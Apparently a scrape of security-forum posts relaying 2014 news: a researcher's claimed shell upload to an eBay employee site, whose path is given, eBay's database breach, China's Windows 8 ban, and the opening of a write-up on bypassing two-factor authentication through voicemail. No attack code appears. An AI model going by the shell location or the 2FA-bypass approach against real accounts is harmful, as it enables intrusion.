Jordan Jones(@CEHSecurity), a Security researcher, claims to have discovered a critical security vulnerability in the eBay website for employees that allowed him to upload a backdoor shell. Jordan said in his tweet that he notified about the vulnerability to eBay. A screenshot published in his twitter account shows that he is able to upload a 'shell.php' file in the following location: "https://dsl.ebay.com/wp-includes/Text/Diff/Engine/shell.php" At the time of writing, the file is still there. The last modified date of the file is December 2012. It is quite possible to modify the TimeStamp. So, we are not sure from when the file is there. Trying to access the shell ends up in blank page. It means either the researcher have modified the shell to run only when a particular input is passed or it is not a shell. Jordan have also discovered a cross site scripting vulnerability in the eBay Research Labs page(labs.ebay.com). Sursa: Researcher finds vulnerability in eBay and claims he uploaded a shell - E Hacker News

Auction site eBay is forcing users to change their passwords after a cyber-attack compromised its systems. The US firm said a database had been hacked between late February and early March, and had contained encrypted passwords and other non-financial data. The company added that it had no evidence of there being unauthorised activity on its members' accounts. However, it said that changing the passwords was "best practice and will help enhance security for eBay users" Cyberattackers compromised a small number of employee log-in credentials, allowing unauthorized access to eBay’s corporate network, the company said. Working with law enforcement and leading security experts, the company is aggressively investigating the matter and applying the best forensics tools and practices to protect customers. The database, which was compromised between late February and early March, included eBay customers’ name, encrypted password, email address, physical address, phone number and date of birth. However, the database did not contain financial information or other confidential personal information. The company said that the compromised employee log-in credentials were first detected about two weeks ago. Extensive forensics subsequently identified the compromised eBay database, resulting in the company’s announcement today. The company said it has seen no indication of increased fraudulent account activity on eBay. The company also said it has no evidence of unauthorized access or compromises to personal or financial information for PayPal users. PayPal data is stored separately on a secure network, and all PayPal financial information is encrypted. Beginning later today, eBay users will be notified via email, site communications and other marketing channels to change their password. In addition to asking users to change their eBay password, the company said it also is encouraging any eBay user who utilized the same password on other sites to change those passwords, too. The same password should never be used across multiple sites or accounts. Surse: BBC News - eBay makes users change their passwords after hack eBay Inc. To Ask eBay Users To Change Passwords | ebay inc

C decompiler online: Retargetable Decompiler //nu decompileaza C++, a testat @nedo

The Chinese government has banned the installation of Windows 8 on government PCs, reports Re/code. The Central Government Procurement Center issued a directive last week barring the use of Microsoft's latest operating system as an energy-saving measure, according to Re/code. State news agency Xinhua gave a different reason for the ban: it's to ensure system security after Microsoft ended support for Windows XP. The unsupported operating system is still estimated to be used on as much as half of the Chinese desktop market. How the ban makes sense, either as a security measure or an energy-saving one, isn't clear. Lest there be any doubt, the solution to Windows XP's security problems—it's vulnerable to a number of unpatched flaws already—is to stop using it. Not ban the use of an actively supported operating system. Sursa: China bans Windows 8 on government PCs to ensure security | Ars Technica Pe acelasi subiect: China bans government purchases of Windows 8, surprising Microsoft | ITworld http://thehackernews.com/2014/05/china-bans-microsoft-windows-8-for.html

"ce îi opre?te s? afle parola înainte de moarte?" Am disecat problema impreuna cu @em traieste, ii apare in logurile site-ului faptul ca cineva face brute. Ca raspuns el poate schimba parola si cei 2 vor ramane cu buzele umflate, urmand ca el sa gaseasca alte 2 persoane carora sa le incredinteze secretul.

I remember fondly two years ago, when 2-Factor-Authentication (2FA) became popular and well used across major web applications (Google, Facebook, Yahoo and others). I found, my naive sixteen year old self unable to come to terms for why the genius idea had not been thought of before. At the time, I felt that 2FA was that golden shield you could cover yourself with and defend against some of the most sophisticated phishing attacks calmly. Whilst 2FA can still be that golden shield to the critical applications you use in your life, I shall be documenting below - using an array of exploitation methods, how I was able to bypass 2FA for Google, Facebook, Yahoo, LinkedIn and basically any service which sends 2FA tokens to voicemail. Note: More than 9.59 million Australian Optus mobile subscribers are affected by the voicemail hack I detail below. Anyone from that 9.59 million with 2FA enabled, is vulnerable to the 2FA bypass I document below. Table of Contents Analysis of 2FA, Concept and Flow of Exploit Disclosure to Google Security Team Disclosure to Facebook Security Team Disclosure to LinkedIn Security Team Disclosure to Yahoo Security Team Disclosure to Authy & Duosecurity - (Universal 2FA Provider) - Not Vulnerable Mitigation Techniques and Disclosures to Telco's Final notes Articol complet: How I bypassed 2-Factor-Authentication on Google, Facebook, Yahoo, LinkedIn, and many others.